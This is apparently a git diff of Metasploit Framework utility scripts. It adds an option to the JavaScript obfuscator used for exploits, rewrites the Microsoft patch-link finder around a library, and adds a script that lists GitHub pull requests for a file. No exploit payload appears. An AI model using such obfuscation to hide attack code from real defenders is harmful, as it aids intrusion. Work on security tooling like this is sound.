b/tools/exploit/jsobfu.rb index e491dbc54e..d3417c1612 100755 --- a/tools/exploit/jsobfu.rb +++ b/tools/exploit/jsobfu.rb @@ -32,6 +32,10 @@ module Jsobfu options[:output] = v end + opt.on('-p', '--preserved-identifiers id1,id2', 'The identifiers to preserve') do |v| + options[:preserved_identifiers] = v.split(',') + end + opt.on_tail('-h', '--help', 'Show this message') do $stdout.puts opt exit @@ -67,7 +71,10 @@ module Jsobfu def run original_js = read_js(@opts[:input]) js = ::Rex::Exploitation::JSObfu.new(original_js) - js.obfuscate(:iterations=>@opts[:iteration].to_i) + obfu_opts = {} + obfu_opts.merge!(iterations: @opts[:iteration].to_i) + obfu_opts.merge!(preserved_identifiers: @opts[:preserved_identifiers] || []) + js.obfuscate(obfu_opts) js = js.to_s output_stream = $stdout diff --git a/tools/exploit/msu_finder.rb b/tools/exploit/msu_finder.rb index b6d510e1dc..5203a5b167 100755 --- a/tools/exploit/msu_finder.rb +++ b/tools/exploit/msu_finder.rb @@ -1,771 +1,108 @@ #!/usr/bin/env ruby -### -# -# This sceript will enumerate download links for Microsoft patches. -# -# Author: -# * sinn3r -# -### - - -msfbase = __FILE__ -while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) -end -$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) -require 'rex' -require 'nokogiri' -require 'uri' -require 'json' +require 'patch_finder/core/helper' +require 'patch_finder/msu' require 'optparse' -module MicrosoftPatchFinder +class PatchFinderBin - module SiteInfo - TECHNET = { - ip: '157.56.148.23', - vhost: 'technet.microsoft.com' - } + include PatchFinder::Helper - MICROSOFT = { - ip: '104.72.230.162', - vhost: 'www.microsoft.com' - } + attr_reader :args - GOOGLEAPIS = { - ip: '74.125.28.95', - vhost: 'www.googleapis.com' - } - end + def get_parsed_options + options = {} - # This provides whatever other classes need. - module Helper + parser = OptionParser.new do |opt| + opt.separator '' + opt.separator 'Specific options:' - # Prints a debug message. - # - # @param msg [String] The message to print. - # @return [void] - def print_debug(msg='') - $stderr.puts "[DEBUG] #{msg}" - end + opt.on('-q', '--query <keyword>', 'Find advisories including this keyword') do |v| + options[:keyword] = v + end - # Prints a status message. - # - # @param msg [String] The message to print. - # @return [void] - def print_status(msg='') - $stderr.puts "[*] #{msg}" - end - - # Prints an error message. - # - # @param msg [String] The message to print. - # @return [void] - def print_error(msg='') - $stderr.puts "[ERROR] #{msg}" - end - - # Prints a regular message. - # - # @param msg [String] The message to print. - # @return pvoid - def print_line(msg='') - $stdout.puts msg - end - - # Sends an HTTP request with Rex. - # - # @param rhost [Hash] Information about the target host. Use MicrosoftPatchFinder::SiteInfo. - # @option rhost [String] :vhost - # @option rhost [String] :ip IPv4 address - # @param opts [Hash] Information about the Rex request. - # @raise [RuntimeError] Failure to make a request. - # @return [Rex::Proto::Http::Response] - def send_http_request(rhost, opts={}) - res = nil - - opts.merge!({'vhost'=>rhost[:vhost]}) - - print_debug("Requesting: #{opts['uri']}") - - cli = Rex::Proto::Http::Client.new(rhost[:ip], 443, {}, true, 'TLS1') - tries = 1 - begin - cli.connect - req = cli.request_cgi(opts) - res = cli.send_recv(req) - rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e - if tries < 3 - print_error("Failed to make a request, but will try again in 5 seconds...") - sleep(5) - tries += 1 - retry + opt.on('-s', '--search-engine <engine>', '(Optional) The type of search engine to use (Technet or Google). Default: Technet') do |v| + case v.to_s + when /^google$/i + options[:search_engine] = :google + when /^technet$/i + options[:search_engine] = :technet else - raise "[x] Unable to make a request: #{e.class} #{e.message}\n#{e.backtrace * "\n"}" - end - ensure - cli.close - end - - res - end - end - - - # Collects MSU download links from Technet. - class PatchLinkCollector - include MicrosoftPatchFinder::Helper - - # Returns a response of an advisory page. - # - # @param msb [String] MSB number in this format: msxx-xxx - # @return [Rex::Proto::Http::Response] - def download_advisory(msb) - send_http_request(SiteInfo::TECHNET, { - 'uri' => "/en-us/library/security/#{msb}.aspx" - }) - end - - - # Returns the most appropriate pattern that could be used to parse and extract links from an advisory. - # - # @param n [Nokogiri::HTML::Document] The advisory page parsed by Nokogiri - # @return [Hash] - def get_appropriate_pattern(n) - # These pattern checks need to be in this order. - patterns = [ - # This works from MS14-001 until the most recent - { - check: '//div[@id="mainBody"]//div//h2//div//span[contains(text(), "Affected Software")]', - pattern: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//table//a' - }, - # This works from ms03-040 until MS07-029 - { - check: '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]', - pattern: '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]' - }, - # This works from sometime until ms03-039 - { - check: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//p//strong[contains(text(), "Download locations")]', - pattern: '//div[@id="mainBody"]//div//div[@class="sectionblock"]//ul//li//a' - }, - # This works from MS07-030 until MS13-106 (the last update in 2013) - # The check is pretty short so if it kicks in too early, it tends to create false positives. - # So it goes last. - { - check: '//div[@id="mainBody"]//p//strong[contains(text(), "Affected Software")]', - pattern: '//div[@id="mainBody"]//table//a' - }, - ] - - patterns.each do |pattern| - if n.at_xpath(pattern[:check]) - return pattern[:pattern] + fail OptionParser::InvalidOption, "Invalid search engine: #{v}" end end - nil - end - - - # Returns the details page for an advisory. - # - # @param res [Rex::Proto::Http::Response] - # @return [Array<URI::HTTP>] An array of URI objects. - def get_details_aspx(res) - links = [] - - page = res.body - n = ::Nokogiri::HTML(page) - - appropriate_pattern = get_appropriate_pattern(n) - - n.search(appropriate_pattern).each do |anchor| - found_link = anchor.attributes['href'].value - if /https:\/\/www\.microsoft\.com\/downloads\/details\.aspx\?familyid=/i === found_link - begin - links << URI(found_link) - rescue ::URI::InvalidURIError - print_error "Unable to parse URI: #{found_link}" - end - end + opt.on('-r', '--regex <string>', '(Optional) Specify what type of links you want') do |v| + options[:regex] = v end - links - end - - - # Returns the redirected page. - # - # @param rhost [Hash] From MicrosoftPatchFinder::SiteInfo - # @param res [Rex::Proto::Http::Response] - # @return [Rex::Proto::Http::Response] - def follow_redirect(rhost, res) - opts = { - 'method' => 'GET', - 'uri' => res.headers['Location'] - } - - send_http_request(rhost, opts) - end - - - # Returns the download page of an advisory. - # - # @param uri [URI::HTTP] - # @return [Rex::Proto::Http::Response] - def get_download_page(uri) - opts = { - 'method' => 'GET', - 'uri' => uri.request_uri - } - - res = send_http_request(SiteInfo::MICROSOFT, opts) - - if res.headers['Location'] - return follow_redirect(SiteInfo::MICROSOFT, res) + opt.on('--apikey <key>', '(Optional) Google API key.') do |v| + options[:google_api_key] = v end - res - end - - - # Returns a collection of found MSU download links from an advisory. - # - # @param page [String] The HTML page of the advisory. - # @return [Array<String>] An array of links - def get_download_links(page) - page = ::Nokogiri::HTML(page) - - relative_uri = page.search('a').select { |a| - a.attributes['href'] && a.attributes['href'].value.include?('confirmation.aspx?id=') - }.first - - return [] unless relative_uri - relative_uri = relative_uri.attributes['href'].value - - absolute_uri = URI("https://www.microsoft.com/en-us/download/#{relative_uri}") - opts = { - 'method' => 'GET', - 'uri' => absolute_uri.request_uri - } - res = send_http_request(SiteInfo::MICROSOFT, opts) - n = ::Nokogiri::HTML(res.body) - - n.search('a').select { |a| - a.attributes['href'] && a.attributes['href'].value.include?('http://download.microsoft.com/download/') - }.map! { |a| a.attributes['href'].value }.uniq - end - - - # Returns whether the page is an advisory or not. - # - # @param res [Rex::Proto::Http::Response] - # @return [Boolean] true if the page is an advisory, otherwise false. - def has_advisory?(res) - !res.body.include?('We are sorry. The page you requested cannot be found') - end - - - # Returns whether the number is in valid MSB format or not. - # - # @param msb [String] The number to check. - # @return [Boolean] true if the number is in MSB format, otherwise false. - def is_valid_msb?(msb) - /^ms\d\d\-\d\d\d$/i === msb - end - end - - - # A class that searches advisories from Technet. - class TechnetMsbSearch - include MicrosoftPatchFinder::Helper - - def initialize - opts = { - 'method' => 'GET', - 'uri' => '/en-us/security/bulletin/dn602597.aspx' - } - res = send_http_request(SiteInfo::TECHNET, opts) - @firstpage ||= res.body - end - - - # Returns a collection of found MSB numbers either from the product list, or generic search. - # - # @param keyword [String] The product to look for. - # @return [Array<String>] - def find_msb_numbers(keyword) - product_list_matches = get_product_dropdown_list.select { |p| Regexp.new(keyword) === p[:option_text] } - if product_list_matches.empty? - print_debug("Did not find a match from the product list, attempting a generic search") - search_by_keyword(keyword) - else - product_names = [] - ids = [] - product_list_matches.each do |e| - ids << e[:option_value] - product_names << e[:option_text] - end - print_debug("Matches from the product list (#{product_names.length}): #{ product_names * ', ' }") - search_by_product_ids(ids) - end - end - - - # Returns the search results in JSON format. - # - # @param keyword [String] The keyword to search. - # @return [Hash] JSON data. - def search(keyword) - opts = { - 'method' => 'GET', - 'uri' => '/security/bulletin/services/GetBulletins', - 'vars_get' => { - 'searchText' => keyword, - 'sortField' => '0', - 'sortOrder' => '1', - 'currentPage' => '1', - 'bulletinsPerPage' => '9999', - 'locale' => 'en-us' - } - } - res = send_http_request(SiteInfo::TECHNET, opts) - begin - return JSON.parse(res.body) - rescue JSON::ParserError + opt.on('--cx <id>', '(Optional) Google search engine ID.') do |v| + options[:google_search_engine_id] = v end - {} - end + opt.on('-d', '--dir <string>', '(Optional) The directory to save the patches') do |v| + unless File.directory?(v) + fail OptionParser::InvalidOption, "Directory not found: #{v}" + end - - # Performs a search based on product IDs - # - # @param ids [Array<Fixnum>] An array of product IDs. - # @return [Array<String>] An array of found MSB numbers. - def search_by_product_ids(ids) - msb_numbers = [] - - ids.each do |id| - j = search(id) - msb = j['b'].collect { |e| e['Id']}.map{ |e| e.downcase} - msb_numbers.concat(msb) + options[:destdir] = v end - msb_numbers - end - - - # Performs a search based on a keyword - # - # @param keyword [String] - # @return [Array<String>] An array of found MSB numbers - def search_by_keyword(keyword) - j = search(keyword) - j['b'].collect { |e| e['Id']}.map{ |e| e.downcase } - end - - - # Returns the product list that Technet currently supports for searching. - # - # @return [Array<Hash>] - def get_product_dropdown_list - @product_dropdown_list ||= lambda { - list = [] - - page = ::Nokogiri::HTML(firstpage) - page.search('//div[@class="sb-search"]//select[@id="productDropdown"]//option').each do |product| - option_value = product.attributes['value'].value - option_text = product.text - next if option_value == '-1' # This is the ALL option - list << { option_value: option_value, option_text: option_text } - end - - list - }.call - end - - attr_reader :firstpage - end - - class GoogleMsbSearch - include MicrosoftPatchFinder::Helper - - # API Doc: - # https://developers.google.com/custom-search/json-api/v1/using_rest - # Known bug: - # * Always gets 20 MSB results. Weird. - - def initialize(opts={}) - @api_key = opts[:api_key] - @search_engine_id = opts[:search_engine_id] - end - - - # Returns the MSB numbers associated with the keyword. - # - # @param keyword [String] The keyword to search for in an advisory. - # @return [Array<String>] MSB numbers - def find_msb_numbers(keyword) - msb_numbers = [] - next_starting_index = 1 - - begin - while - results = search(keyword: keyword, starting_index: next_starting_index) - items = results['items'] - items.each do |item| - title = item['title'] - msb = title.scan(/Microsoft Security Bulletin (MS\d\d\-\d\d\d)/).flatten.first - if msb - msb_numbers << msb.downcase - end - end - - next_starting_index = get_next_index(results) - next_page = results['queries']['nextPage'] - - # Google API Documentation: - # https://developers.google.com/custom-search/json-api/v1/using_rest - # "This role is not present if the current results are the last page. - # Note: This API returns up to the first 100 results only." - break if next_page.nil? || next_starting_index > 100 - end - rescue RuntimeError => e - print_error(e.message) - return msb_numbers.uniq - end - - msb_numbers.uniq - end - - - # Performs a search using Google API - # - # @param opts [Hash] - # @options opts [String] :keyword The keyword to search - # @return [Hash] JSON data - def search(opts={}) - starting_index = opts[:starting_index] - - search_string = [ - opts[:keyword], - 'intitle:"Microsoft Security Bulletin"', - '-"Microsoft Security Bulletin Summary"' - ].join(' ') - - opts = { - 'method' => 'GET', - 'uri' => '/customsearch/v1', - 'vars_get' => { - 'key' => api_key, - 'cx' => search_engine_id, - 'q' => search_string, - 'start' => starting_index.to_s, - 'num' => '10', # 10 is max - 'c2coff' => '1' # 1 = Disabled, 0 = Enabled - } - } - - res = send_http_request(SiteInfo::GOOGLEAPIS, opts) - results = parse_results(res) - if starting_index == 1 - print_debug("Number of search results: #{get_total_results(results)}") - end - - results - end - - - # Parse Google API search results - # - # @param res [Rex::Proto::Http::Response] - # @raise [RuntimeError] If Google returns an error - # @return [Hash] - def parse_results(res) - j = JSON.parse(res.body) - - if j['error'] - message = j['error']['errors'].first['message'] - reason = j['error']['errors'].first['reason'] - raise "Google Search failed. #{message} (#{reason})" - end - - j - end - - - # Returns the total results. - # - # @param j [Hash] JSON data from Google. - # @return [Fixnum] - def get_total_results(j) - j['queries']['request'].first['totalResults'].to_i - end - - - # Returns the next index. - # - # @param j [Hash] JSON data from Google. - # @return [Fixnum] - def get_next_index(j) - j['queries']['nextPage'] ? j['queries']['nextPage'].first['startIndex'] : 0 - end - - # @!attribute api_key - # @return [String] The Google API key - attr_reader :api_key - - # @!attribute search_engine_id - # @return [String] The Google Custom Search Engine ID - attr_reader :search_engine_id - end - - class OptsConsole - def self.banner - %Q| - Usage: #{__FILE__} [options] - - The following example will download all IE update links: - #{__FILE__} -q "Internet Explorer" - - Searching advisories via Technet: - When you submit a query, the Technet search engine will first look it up from a product list, - and then return all the advisories that include the keyword you are looking for. If there's - no match from the product list, then the script will try a generic search. The generic method - also means you can search by MSB, KB, or even the CVE number. - - Searching advisories via Google: - Searching via Google requires an API key and an Search Engine ID from Google. To obtain these, - make sure you have a Google account (such as Gmail), and then do the following: - 1. Go to Google Developer's Console - 1. Enable Custom Search API - 2. Create a browser type credential. The credential is the API key. - 2. Go to Custom Search - 1. Create a new search engine - 2. Under Sites to Search, set: technet.microsoft.com - 3. In your search site, get the Search Engine ID under the Basics tab. - By default, Google has a quota limit of 1000 queries per day. You can raise this limit with - a fee. - - The way this tool uses Google to find advisories is the same as doing the following manually: - [Query] site:technet.microsoft.com intitle:"Microsoft Security Bulletin" -"Microsoft Security Bulletin Summary" - - Dryrun: - If you'd like to double check on false positives, you can use the -d flag and manually verify - the accuracy of the search results before actually collecting the download links. - - Download: - The following trick demonstrates how you can automatically download the updates: - ruby #{__FILE__} -q "ms15-100" -r x86 > /tmp/list.txt && wget -i /tmp/list.txt - - Patch Extraction: - After downloading the patch, you can use the extract_msu.bat tool to automatically extract - Microsoft patches. - | - end - - def self.get_parsed_options - options = {} - - parser = OptionParser.new do |opt| - opt.banner = banner.strip.gsub(/^[[:blank:]]{4}/, '') - opt.separator '' - opt.separator 'Specific options:' - - opt.on('-q', '--query <keyword>', 'Find advisories that include this keyword') do |v| - options[:keyword] = v - end - - opt.on('-s', '--search-engine <engine>', '(Optional) The type of search engine to use (Technet or Google). Default: Technet') do |v| - case v.to_s - when /^google$/i - options[:search_engine] = :google - when /^technet$/i - options[:search_engine] = :technet - else - raise OptionParser::MissingArgument, "Invalid search engine: #{v}" - end - end - - opt.on('-r', '--regex <string>', '(Optional) Specify what type of links you want') do |v| - options[:regex] = v - end - - opt.on('--apikey <key>', '(Optional) Google API key. Set this if the search engine is Google') do |v| - options[:google_api_key] = v - end - - opt.on('--cx <id>', '(Optional) Google search engine ID. Set this if the search engine is Google') do |v| - options[:google_search_engine_id] = v - end - - opt.on('-d', '--dryrun', '(Optional) Perform a search, but do not fetch download links. Default: no') do |v| - options[:dryrun] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - $stderr.puts opt - exit - end - end - - parser.parse! - - if options.empty? - raise OptionParser::MissingArgument, 'No options set, try -h for usage' - elsif options[:keyword].nil? || options[:keyword].empty? - raise OptionParser::MissingArgument, '-q is required' - end - - unless options[:search_engine] - options[:search_engine] = :technet - end - - if options[:search_engine] == :google - if options[:google_api_key].nil? || options[:google_search_engine_id].empty? - raise OptionParser::MissingArgument, 'Search engine is Google, but no API key specified' - elsif options[:google_search_engine_id].nil? || options[:google_search_engine_id].empty? - raise OptionParser::MissingArgument, 'Search engine is Google, but no search engine ID specified' - end - end - - options - end - end - - class Driver - include MicrosoftPatchFinder::Helper - - def initialize - begin - @args = MicrosoftPatchFinder::OptsConsole.get_parsed_options - rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e - print_error(e.message) + opt.on_tail('-h', '--help', 'Show this message') do + $stderr.puts opt exit end end - # Returns download links. - # - # @param msb [String] MSB number. - # @param regex [String] The regex pattern to use to collect specific download URLs. - # @return [Array<String>] Download links - def get_download_links(msb, regex=nil) - msft = MicrosoftPatchFinder::PatchLinkCollector.new + parser.parse! - unless msft.is_valid_msb?(msb) - print_error "Not a valid MSB format." - print_error "Example of a correct one: ms15-100" - return [] - end - - res = msft.download_advisory(msb) - - if !msft.has_advisory?(res) - print_error "The advisory cannot be found" - return [] - end - - links = msft.get_details_aspx(res) - if links.length == 0 - print_error "Unable to find download.microsoft.com links. Please manually navigate to the page." - return [] - else - print_debug("Found #{links.length} affected products for this advisory.") - end - - link_collector = [] - - links.each do |link| - download_page = msft.get_download_page(link) - download_links = msft.get_download_links(download_page.body) - if regex - filtered_links = download_links.select { |l| Regexp.new(regex) === l } - link_collector.concat(filtered_links) - else - link_collector.concat(download_links) - end - end - - link_collector + if options.empty? + fail OptionParser::MissingArgument, 'No options set, try -h for usage' + elsif options[:keyword].nil? || options[:keyword].empty? + fail OptionParser::MissingArgument, '-q is required' end - # Performs a search via Google - # - # @param keyword [String] The keyword to search - # @param api_key [String] Google API key - # @param cx [String] Google Search Engine Key - # @return [Array<String>] See MicrosoftPatchFinder::GoogleMsbSearch#find_msb_numbers - def google_search(keyword, api_key, cx) - search = MicrosoftPatchFinder::GoogleMsbSearch.new(api_key: api_key, search_engine_id: cx) - search.find_msb_numbers(keyword) + unless options[:search_engine] + options[:search_engine] = :technet end - - # Performs a search via Technet - # - # @param keyword [String] The keyword to search - # @return [Array<String>] See MicrosoftPatchFinder::TechnetMsbSearch#find_msb_numbers - def technet_search(keyword) - search = MicrosoftPatchFinder::TechnetMsbSearch.new - search.find_msb_numbers(keyword) - end - - def run - links = [] - msb_numbers = [] - keyword = args[:keyword] - regex = args[:regex] ? args[:regex] : nil - api_key = args[:google_api_key] - cx = args[:google_search_engine_id] - - case args[:search_engine] - when :technet - print_debug("Searching advisories that include #{keyword} via Technet") - msb_numbers = technet_search(keyword) - when :google - print_debug("Searching advisories that include #{keyword} via Google") - msb_numbers = google_search(keyword, api_key, cx) - end - - print_debug("Advisories found (#{msb_numbers.length}): #{msb_numbers * ', '}") unless msb_numbers.empty? - - return if args[:dryrun] - - msb_numbers.each do |msb| - print_debug("Finding download links for #{msb}") - links.concat(get_download_links(msb, regex)) - end - - unless links.empty? - print_status "Found these links:" - print_line links * "\n" - print_status "Total downloadable updates found: #{links.length}" + if options[:search_engine] == :google + if options[:google_api_key].nil? || options[:google_search_engine_id].empty? + fail OptionParser::MissingArgument, 'No API key set for Google' + elsif options[:google_search_engine_id].nil? || options[:google_search_engine_id].empty? + fail OptionParser::MissingArgument, 'No search engine ID set for Google' end end - attr_reader :args + options + end + + def initialize + @args = get_parsed_options + rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e + print_error(e.message) + exit + end + + def main + cli = PatchFinder::MSU.new(verbose: true) + links = cli.find_msu_download_links(args) + if args[:destdir] + print_status("Download links found: #{links.length}") + print_status('Downloading files, please wait...') + download_files(links, args[:destdir]) + else + print_status('Download links found:') + print_line(links * "\n") + end end end - if __FILE__ == $PROGRAM_NAME - mod = MicrosoftPatchFinder::Driver.new - begin - mod.run - rescue Interrupt - $stdout.puts - $stdout.puts "Good bye" - end + bin = PatchFinderBin.new + bin.main end - -=begin -TODO: - * Make a gem - * Make it generic in order to manage different kind of patches and providers - * Multithreading -=end \ No newline at end of file diff --git a/tools/modules/file_pull_requests.rb b/tools/modules/file_pull_requests.rb new file mode 100755 index 0000000000..547561ff18 --- /dev/null +++ b/tools/modules/file_pull_requests.rb @@ -0,0 +1,251 @@ +#!/usr/bin/env ruby + +### +# +# This tool allows you to find all the pull requests for a particular file in the Metasploit +# repository. It does not include commit history from SVN. +# +# Author: sinn3r +# +### + +require 'net/http' +require 'optparse' + +begin + require 'octokit' + require 'nokogiri' +rescue LoadError => e + gem = e.message.split.last + abort "#{gem} not installed: please run `gem install #{gem}'" +end + +module FilePullRequestCollector + + class Exception < RuntimeError; end + + class PullRequestFinder + + attr_accessor :git_client + attr_accessor :repository + attr_accessor :branch + attr_accessor :owner + attr_accessor :git_access_token + + # Initializes parameters. + # + # @param api_key [String] Personal access token from Github. + # @return [void] + def initialize(api_key) + self.owner = 'rapid7' + self.repository = "#{owner}/metasploit-framework" + self.branch = 'master' + self.git_access_token = api_key + self.git_client = Octokit::Client.new(access_token: git_access_token) + end + + # Returns the commit history of a file. + # + # @param path [String] A file path in the Metasploit repository. + # @return [Array<Sawyer::Resource>] An array of commits. + # @raise [FilePullRequestCollector::Exception] No commits found. Probably the file path is wrong. + def get_commits_from_file(path) + commits = git_client.commits(repository, branch, path: path) + if commits.empty? + # Possibly the path is wrong. + raise FilePullRequestCollector::Exception, 'No commits found.' + end + + commits + end + + # Returns the author of a commit. + # + # @param commit [Sawyer::Resource] Commit. + # @return [String] + def get_author(commit) + if commit.author + return commit.author[:login].to_s + end + + '' + end + + # Checks if a author should be ignored or not. + # + # @param commit [Sawyer::Resource] Commit. + # @return [TrueClass] Author should be ignored + # @return [FalseClass] Author should not be ignored. + def is_author_blacklisted?(commit) + ['tabassassin'].include?(get_author(commit)) + end + + # Returns all found pull requests. + # + # @param commits [Array<Sawyer::Resource>] Commits + # @return [Hash] + def get_pull_requests_from_commits(commits) + pull_requests = {} + + commits.each do |commit| + next if is_author_blacklisted?(commit) + + pr = get_pull_request_from_commit(commit) + unless pr.empty? + pull_requests[pr[:number]] = pr + end + end + + pull_requests + end + + # Returns the found pull request for a commit. + # + # @param commit [Sawyer::Resource] Commit + # @return [Hash] + def get_pull_request_from_commit(commit) + sha = commit.sha + url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + n = Nokogiri::HTML(res.body) + found_pr_link = n.at('li[@class="pull-request"]//a') + + # If there is no PR associated with this commit, it's probably from the SVN days. + return {} unless found_pr_link + + href = found_pr_link.attributes['href'].text + title = found_pr_link.attributes['title'].text + + # Filter out all the pull requests that do not belong to rapid7. + # If this happens, it's probably because the PR was submitted to somebody's fork. + return {} unless /^\/#{owner}\// === href + + { number: href.scan(/\d+$/).flatten.first, title: title } + end + end + + class Client + + attr_accessor :finder + + # Initializes parameters. + # + # @param api_key [String] + # @return [void] + def initialize(api_key) + self.finder = PullRequestFinder.new(api_key) + end + + # Prints all the found PRs for a file. + # + # @param file_name [String] The file to look up. + # @return [void] + def search(file_name) + commits = finder.get_commits_from_file(file_name) + pull_requests = finder.get_pull_requests_from_commits(commits) + puts "Pull request(s) associated with #{file_name}" + pull_requests.each_pair do |number, pr| + puts "##{number} - #{pr[:title]}" + end + end + end + + class OptsParser + + def self.banner + %Q| + This tool collects all the pull requests submitted to rapid7/metasploit-framework for a + particular file. It does not include history from SVN (what Metasploit used to use + before Git). + + Usage: #{__FILE__} [options] + + Usage Example: + #{__FILE__} -k KEY -f modules/exploits/windows/browser/ms13_069_caret.rb + or + export GITHUB_OAUTH_TOKEN=KEY + #{__FILE__} -f modules/exploits/windows/browser/ms13_069_caret.rb + + How to obtain an API key (access token): + 1. Go to github.com. + 2. Go to Settings under your profile. + 3. Click on Personal Access Tokens + 4. Click on Generate new token + 5. Follow the steps on the screen to complete the process. + + | + end + + def self.parse(args) + options = {} + + opts = OptionParser.new do |opts| + opts.banner = banner.strip.gsub(/^[[:blank:]]{4}/, '') + + opts.separator "" + opts.separator "Specific options:" + + opts.on("-k", "-k <key>", "Github Access Token") do |v| + options[:api_key] = v + end + + opts.on("-f", "--file <name>", "File name") do |v| + options[:file] = v + end + + opts.separator "" + opts.separator "Common options:" + + opts.on_tail("-h", "--help", "Show this message") do + puts opts + exit + end + end + + begin + opts.parse!(args) + rescue OptionParser::InvalidOption + abort "Invalid option, try -h for usage" + end + + if options.empty? + abort "No options specified, try -h for usage" + end + + options + end + end + +end + +if __FILE__ == $PROGRAM_NAME + begin + opts = FilePullRequestCollector::OptsParser.parse(ARGV) + rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e + abort "#{e.message} (please see -h)" + end + + if !opts.has_key?(:api_key) + if !ENV.has_key?('GITHUB_OAUTH_TOKEN') + abort <<EOF +A Github Access Token must be specified to use this tool +Please set GITHUB_OAUTH_TOKEN or specify the -k option +EOF + else + opts[:api_key] = ENV['GITHUB_OAUTH_TOKEN'] + end + end + + begin + cli = FilePullRequestCollector::Client.new(opts[:api_key]) + cli.search(opts[:file]) + rescue FilePullRequestCollector::Exception => e + abort e.message + rescue Interrupt + $stdout.puts + $stdout.puts "Good bye" + end +end